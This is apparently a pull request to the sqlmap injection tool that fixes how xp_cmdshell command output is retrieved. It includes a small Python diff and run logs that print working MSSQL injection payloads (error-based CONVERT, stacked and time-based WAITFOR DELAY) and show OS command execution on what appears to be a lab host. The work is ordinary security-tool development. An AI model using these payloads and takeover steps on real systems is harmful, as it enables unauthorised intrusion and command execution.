### PR TITLE
Unable to retrieve XP_Cmdshell Output

### DIFF
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -209,9 +209,10 @@ class Xp_cmdshell:
 
             query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName)
 
+	    output = None
             if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
                 output = inject.getValue(query, resumeValue=False, blind=False, time=False)
-            
+
 	    if (output is None) or len(output)==0 or output[0] is None:
                 output = []
                 count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)


### PR DESCRIPTION
I have modified the logic of the xp_cmdshell to return command line results more reliably.

At present, if both Error Based (or presumably Union or Direct) and Stacked Based queries are available the following error occurs (specifying --technique=S bypasses this):

```
./sqlmap.py -u "http://sqlinjection/Default.aspx?__VIEWSTATE=%2FwEPDwUKMjEyNDQ3ODY4NGRk&txtUsername=a&txtPassword=a&btnLogin=Login" --os-cmd "echo 1" --time-sec 1

    sqlmap/1.0-dev-63d0e9b - automatic SQL injection and database takeover tool
    http://sqlmap.org

[10:20:59] [INFO] resuming back-end DBMS 'microsoft sql server' 
[10:20:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---
Place: GET
Parameter: txtUsername
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMjEyNDQ3ODY4NGRk&txtUsername=a' AND 1227=CONVERT(INT,(CHAR(113) CHAR(102) CHAR(115) CHAR(116) CHAR(113) (SELECT (CASE WHEN (1227=1227) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(111) CHAR(122) CHAR(102) CHAR(113))) AND 'VMOX'='VMOX&txtPassword=a&btnLogin=Login

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMjEyNDQ3ODY4NGRk&txtUsername=a'; WAITFOR DELAY '0:0:1'--&txtPassword=a&btnLogin=Login

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMjEyNDQ3ODY4NGRk&txtUsername=a' WAITFOR DELAY '0:0:1'--&txtPassword=a&btnLogin=Login

---
[10:20:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[10:20:59] [INFO] testing if current user is DBA
[10:20:59] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[10:20:59] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[10:20:59] [INFO] testing if xp_cmdshell extended procedure is usable
[10:21:00] [INFO] the SQL query used returns 1 entries
[10:21:00] [WARNING] reflective value(s) found and filtering out
[10:21:00] [ERROR] it seems that the temporary directory ('c:/Program Files (x86)/Microsoft SQL Server/MSSQL.1/MSSQL/LOG') used for storing console output within the back-end file system does not have writing permissions for the DBMS process. You are advised to manually adjust it with option --tmp-path switch or you will not be able to retrieve the commands output
do you want to retrieve the command standard output? [Y/n/a] 
[10:21:00] [INFO] the SQL query used returns 1 entries
command standard output [1]:

[10:21:00] [INFO] cleaning up the database management system
[10:21:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[10:21:00] [INFO] fetched data logged to text files under '/mnt/hgfs/git/sqlmap/output/sqlinjection'
```

The error message regarding the temporary directory seems to be incorrect - this branch is only followed if conf.dbmsCred is set. I have modified this to only give this error when dbmsCred is set. 

There seems to be a problem with inject.getValue(query, resumeValue=False, blind=False, time=False) (/lib/request/inject.py) either in my scenario method or the way it handles. It enters the Error based branch as expected but it returns [None]. I haven't been able to work out the issue. The if statement at the top of errorUse (/lib/techniques/error.py) is particularly painful to debug! 

If this occurs then we fallback to time-based blind to retrieve the user's output. This also more reliably detects if xp_cmdshell is available as echo 1 returns the correct value:

```
./sqlmap.py -u "http://sqlinjection/Default.aspx?__VIEWSTATE=%2FwEPDwUKMjEyNDQ3ODY4NGRk&txtUsername=a&txtPassword=a&btnLogin=Login" --os-cmd "echo 1" --time-sec 1

[10:26:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[10:26:35] [INFO] testing if current user is DBA
[10:26:35] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[10:26:35] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[10:26:35] [INFO] testing if xp_cmdshell extended procedure is usable
[10:26:35] [INFO] the SQL query used returns 1 entries
[10:26:35] [WARNING] reflective value(s) found and filtering out
[10:26:44] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] 
[10:34:48] [INFO] the SQL query used returns 1 entries
[10:34:48] [INFO] retrieved: 2
[10:34:50] [INFO] retrieved: 1
[10:34:52] [INFO] retrieved:  
command standard output:    '1'
[10:34:57] [INFO] cleaning up the database management system
[10:34:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[10:34:57] [INFO] fetched data logged to text files under '/mnt/hgfs/git/sqlmap/output/sqlinjection'

```
